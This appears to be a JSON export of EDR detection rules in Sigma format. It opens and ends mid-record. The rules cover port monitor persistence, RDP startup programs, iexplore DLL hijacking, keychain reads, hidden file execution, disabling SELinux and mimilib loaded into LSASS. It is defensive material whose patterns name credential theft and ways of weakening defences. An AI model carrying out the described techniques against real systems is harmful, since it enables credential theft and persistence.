# spoolsv.exe installs a lot of printer drivers\n Image:\n - '?:\\windows\\system32\\spoolsv.exe'\n - '?:\\windows\\syswow64\\spoolsv.exe'\n\n exclusion_known_ports:\n TargetObject:\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\7-PDF Print Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Adobe PDF Port Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Adobe PDF Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\AppliDisVirtualPort\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Appmon\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\BlueFilesPrinter\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Bullzip PDF Print Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Client Printer Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Converter driver portmonitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\DipMon\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\EpsonNet Print Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Evolis TCP/IP Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\FollowMe Client Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\FollowMe Local Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\FRCX port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\HP Standard TCP/IP Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\HubMail\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\iXBusMonitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Kioware Language Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\KX Language 
Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Local Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\LPR Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\MI7Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Microsoft Shared Fax Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\MicroStrategy Image Printer Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\MIJ RLP Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\NeeviaWT Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\PaperCut TCP/IP Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\PDF Architect 9 Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\PDF995 Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\pdfcmon\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\PDFLogic Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Port redirigé\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\SC2 TCP/IP Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Seagull Network Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Seagull V3 Network Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\SRCIMonitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Standard TCP/IP Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Tun LPR Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\USB Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Virtual Port Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\WSD Port\\Driver'\n 
- 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Xerox XMP v3 Port Monitor\\Driver'\n\n exclusion_citrix:\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Client Printer Port\\Driver'\n Details: 'cpmon.dll'\n\n exclusion_seagull:\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Seagull Network Monitor\\Driver'\n Details: 'ssnetmon.d64'\n\n exclusion_hp:\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\HP Standard TCP/IP Port\\Driver'\n Details: 'HpTcpMon.dll'\n\n exclusion_wildix:\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Wildix FaxPort\\Driver'\n Details: 'wfaxport.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "88ec665f-3f70-4356-9ad5-87781eb00cbe",
"rule_name": "Port Monitor Installed",
"rule_description": "Detects the installation of a new port monitor on the system.\nPort Monitors are DLLs loaded and run by the print spooler service, spoolsv.exe, under SYSTEM-level permissions on boot.\nAdversaries may use port monitors to run an adversary-supplied DLL during system boot for persistence or privilege escalation.\nIt is recommended to investigate the process that performed the registry modification as well as the target DLL at the path in the registry details.\n",
"rule_creation_date": "2020-09-24",
"rule_modified_date": "2025-11-24",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.010"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "88f710f0-7169-45cc-a19f-9f64b6f35ff8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076364Z",
"creation_date": "2026-03-23T11:45:34.076366Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076371Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://persistence-info.github.io/Data/rdpwdstartupprograms.html",
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_rdp_wds_startup_programs.yml",
"content": "title: RDP WDS StartupPrograms Set via Registry\nid: 88f710f0-7169-45cc-a19f-9f64b6f35ff8\ndescription: |\n Detects a modification in the registry related to the remote session startup programs.\n The registry value \"StartupPrograms\" can be used in order to launch applications (server side) after each RDP session creation.\n It is recommended to investigate the process that added the key as well as the registry value for malicious content.\nreferences:\n - https://persistence-info.github.io/Data/rdpwdstartupprograms.html\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2024/11/05\nmodified: 2025/03/13\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\StartupPrograms'\n\n exclusion_systancia:\n - Image: '?:\\Program Files (x86)\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\adiservr.exe'\n - Details|contains:\n - 'AdisSUP'\n - 'AdisEzScanSrvCfgSession'\n\n exclusion_rdpclip:\n Details: 'rdpclip'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "88f710f0-7169-45cc-a19f-9f64b6f35ff8",
"rule_name": "RDP WDS StartupPrograms Set via Registry",
"rule_description": "Detects a modification in the registry related to the remote session startup programs.\nThe registry value \"StartupPrograms\" can be used in order to launch applications (server side) after each RDP session creation.\nIt is recommended to investigate the process that added the key as well as the registry value for malicious content.\n",
"rule_creation_date": "2024-11-05",
"rule_modified_date": "2025-03-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8924468b-dfa0-4dc8-9a00-b9e81b890840",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080487Z",
"creation_date": "2026-03-23T11:45:34.080489Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080494Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_iexplore.yml",
"content": "title: DLL Hijacking via iexplore.exe\nid: 8924468b-dfa0-4dc8-9a00-b9e81b890840\ndescription: |\n Detects potential Windows DLL Hijacking via iexplore.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n In this case, iertutil.dll doesn't directly exist in the Internet Explorer folder. Therefore, an attacker can plant a malicious iertutil.dll in this folder.\n This DLL will be loaded each time iexplore.exe is executed, but also by instantiating an object via the DCOM InternetExplorer.Application Class remotely, allowing attackers to start the payload remotely and achieve persistence.\n This DLL sideloading attack can also be used in a more classic way, by simply bundling the malicious DLL and the legitimate iexplore.exe inside the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/09\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'iexplore.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\iertutil.dll'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n 
filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8924468b-dfa0-4dc8-9a00-b9e81b890840",
"rule_name": "DLL Hijacking via iexplore.exe",
"rule_description": "Detects potential Windows DLL Hijacking via iexplore.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nIn this case, iertutil.dll doesn't directly exist in the Internet Explorer folder. Therefore, an attacker can plant a malicious iertutil.dll in this folder.\nThis DLL will be loaded each time iexplore.exe is executed, but also by instantiating an object via the DCOM InternetExplorer.Application Class remotely, allowing attackers to start the payload remotely and achieve persistence.\nThis DLL sideloading attack can also be used in a more classic way, by simply bundling the malicious DLL and the legitimate iexplore.exe inside the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-09",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "89253ec2-98e1-46bc-98df-5406a4a094db",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628022Z",
"creation_date": "2026-03-23T11:45:34.628024Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628028Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1555/001/"
],
"name": "t1555_001_user_keychain_access_suspicious_process_macos.yml",
"content": "title: Suspicious Access to User's Keychain\nid: 89253ec2-98e1-46bc-98df-5406a4a094db\ndescription: |\n Detects a suspicious access to the user's Keychain files.\n Adversaries may access Keychain (or Keychain Services) to acquire sensitive information such as account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1555/001/\ndate: 2024/09/26\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.CredentialAccess\n - classification.macOS.Behavior.SensitiveInformation\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_common_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_common_files:\n Kind: 'read'\n Path:\n - '/Users/*/Library/Keychains/*.keychain'\n - '/Users/*/Library/Keychains/*.keychain-db'\n ProcessImage|contains: '?'\n\n selection_susp_ancestors:\n ProcessAncestors|contains:\n # folder\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n # process\n - '/osascript'\n\n selection_susp_process:\n ProcessImage: '/bin/cat'\n\n filter_bin:\n ProcessImage:\n - '/usr/bin/security'\n - '/usr/bin/ldapsearch'\n - '/usr/bin/codesign'\n\n exclusion_process_folders:\n ProcessImage|startswith:\n - '/Applications/'\n - '/Library'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/opt/homebrew/'\n\n exclusion_process_adobe:\n 
ProcessAncestors|contains: '/private/tmp/????????-????-????-????-?????????????/Creative Cloud Installer.app/Contents/MacOS/Install'\n\n exclusion_process_installer:\n ProcessAncestors|contains: '|/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service|'\n\n exclusion_process_terragrunt:\n ProcessImage: '/Users/*/.tgenv/versions/*/terragrunt'\n\n exclusion_folder_signed:\n ProcessImage|startswith: '/users/'\n ProcessSigned: 'true'\n\n adhoc_signed:\n ProcessCodesigningFlagsStr|contains: 'CS_ADHOC'\n\n condition: all of selection_common_* and 1 of selection_susp_* and not 1 of filter_* and not 1 of exclusion_process_* and not (exclusion_folder_signed and not adhoc_signed)\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "89253ec2-98e1-46bc-98df-5406a4a094db",
"rule_name": "Suspicious Access to User's Keychain",
"rule_description": "Detects a suspicious access to the user's Keychain files.\nAdversaries may access Keychain (or Keychain Services) to acquire sensitive information such as account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "89345982-a93f-4606-a99c-932da482d27d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627398Z",
"creation_date": "2026-03-23T11:45:34.627400Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627404Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1564_001_hidden_file_execution.yml",
"content": "title: Hidden File Executed\nid: 89345982-a93f-4606-a99c-932da482d27d\ndescription: |\n Detects the execution of a hidden file.\n Adversaries may hide their files on the system in order to prevents users from spotting them or to evade system analysis tools that do not incorporate investigation of hidden files.\n It is recommended to check for suspicious activities by the newly created process.\nreferences:\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2024/04/03\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1564.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n ProcessName|startswith: '.'\n\n # This is handled by the rule d44c6de2-d37f-4e36-8fa1-f23231dd7632\n filter_launchd:\n ProcessParentImage: '/sbin/launchd'\n\n exclusion_dropbox:\n - ProcessImage: '/Volumes/com.getdropbox.dropbox-*/.dbx_install'\n ProcessParentCommandLine: '/Users/*/Library/Dropbox/DropboxMacUpdate.app/Contents/MacOS/DropboxMacUpdate -check *'\n - ProcessCommandLine|startswith: '/volumes/dropbox offline installer/.install /volumes/dropbox offline installer /applications/dropbox.app'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: '.dbx_install'\n\n exclusion_google:\n ProcessCommandLine: '/Volumes/qual/.install /Volumes/qual/.install /Volumes/qual 0.1'\n ProcessParentCommandLine|startswith: 'GoogleUpdater --server --service=update-internal*'\n\n exclusion_edge:\n ProcessImage: '/Library/Application Support/Microsoft/EdgeUpdater/apps/msedge-qualify/*/.install'\n ProcessParentCommandLine|startswith: 'EdgeUpdater --server --service=update-internal*'\n\n exclusion_bug:\n ProcessName: './bin/perl'\n\n exclusion_mycloud:\n ProcessImage: 
'/private/var/folders/??/*/*/.com.wdc.discovery.mycloud.??????'\n\n exclusion_common_folders:\n ProcessImage|startswith:\n - '/System/Library/'\n - '/Library/Application Support/'\n - '/library/frameworks/'\n - '/Applications/'\n\n exclusion_apple_signed:\n ProcessSignatureSigningId|startswith: 'com.apple.'\n ProcessSigned: 'true'\n\n exclusion_nix:\n Image: '/nix/store/*-wrapped'\n\n exclusion_trendmicro:\n Image: '/Users/*/Library/Application Scripts/com.trendmicro.DrUnzip/.Log/DULog/.DS__Store'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "89345982-a93f-4606-a99c-932da482d27d",
"rule_name": "Hidden File Executed",
"rule_description": "Detects the execution of a hidden file.\nAdversaries may hide their files on the system in order to prevent users from spotting them or to evade system analysis tools that do not incorporate investigation of hidden files.\nIt is recommended to check for suspicious activities by the newly created process.\n",
"rule_creation_date": "2024-04-03",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.002",
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "893dbac9-4830-4f8f-a04e-0d27da61acaa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087354Z",
"creation_date": "2026-03-23T11:45:34.087356Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087360Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_disable_selinux.yml",
"content": "title: SELinux Disabled\nid: 893dbac9-4830-4f8f-a04e-0d27da61acaa\ndescription: |\n Detects the execution of the \"setenforce 0\" command, which disables SELinux. Attackers may use this to disable system-wide mandatory access control (MAC), allowing unauthorized access and privilege escalation.\n Disabling SELinux can facilitate data exfiltration, unauthorized file modifications, and persistence.\n It is recommended to investigate the source of the command execution, review system logs for signs of unauthorized access, and re-enable SELinux if the change was not authorized.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2021/09/22\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/setenforce'\n CommandLine|contains:\n - 'Permissive'\n - '0'\n\n exclusion_alfresco:\n - GrandparentCommandLine|startswith: '/bin/sh /etc/init.d/alfresco '\n - ParentCommandLine|startswith:\n - '/bin/sh /opt/alfresco-community/alfresco.sh '\n - '/bin/sh /opt/iParapheur/alfresco.sh '\n - '/bin/bash /etc/init.d/alfresco '\n - '/bin/sh /etc/init.d/alfresco '\n - '/bin/sh -c /etc/init.d/alfresco '\n - '/bin/sh /opt/alfresco/*/alfresco.sh '\n\n exclusion_dnf:\n GrandparentCommandLine: '/usr/bin/python3 /usr/bin/dnf --quiet -y upgrade'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "893dbac9-4830-4f8f-a04e-0d27da61acaa",
"rule_name": "SELinux Disabled",
"rule_description": "Detects the execution of the \"setenforce 0\" command, which disables SELinux. Attackers may use this to disable system-wide mandatory access control (MAC), allowing unauthorized access and privilege escalation.\nDisabling SELinux can facilitate data exfiltration, unauthorized file modifications, and persistence.\nIt is recommended to investigate the source of the command execution, review system logs for signs of unauthorized access, and re-enable SELinux if the change was not authorized.\n",
"rule_creation_date": "2021-09-22",
"rule_modified_date": "2025-02-04",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "89c64e5b-2c44-4ba7-bc34-928ea7a40174",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084294Z",
"creation_date": "2026-03-23T11:45:34.084296Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084300Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/gentilkiwi/mimikatz",
"https://attack.mitre.org/software/S0002/"
],
"name": "t1003_mimilib_loaded.yml",
"content": "title: LSASS DLL Hijacked via Mimikatz\nid: 89c64e5b-2c44-4ba7-bc34-928ea7a40174\ndescription: |\n Detects the loading of mimilib.dll into the Local Security Authority Subsystem Service (LSASS) process.\n This DLL is specifically designed to hook into LSASS memory to extract credentials, hashes, and Kerberos tickets. This technique requires administrative privileges and is commonly used in post-exploitation phases of an attack.\n It is recommended to investigate the source process that triggered the DLL load, the user context, and any subsequent network connections or file system activity that could indicate credential exfiltration.\nreferences:\n - https://github.com/gentilkiwi/mimikatz\n - https://attack.mitre.org/software/S0002/\ndate: 2021/03/03\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1078\n - attack.t1550.002\n - attack.t1550.003\n - attack.t1574.002\n - attack.s0002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.HackTool.Mimikatz\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection_lsass:\n Image: '?:\\Windows\\System32\\lsass.exe'\n\n selection_mimikatz:\n - InternalName: 'mimilib'\n - OriginalFileName: 'mimilib.dll'\n\n condition: all of selection_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "89c64e5b-2c44-4ba7-bc34-928ea7a40174",
"rule_name": "LSASS DLL Hijacked via Mimikatz",
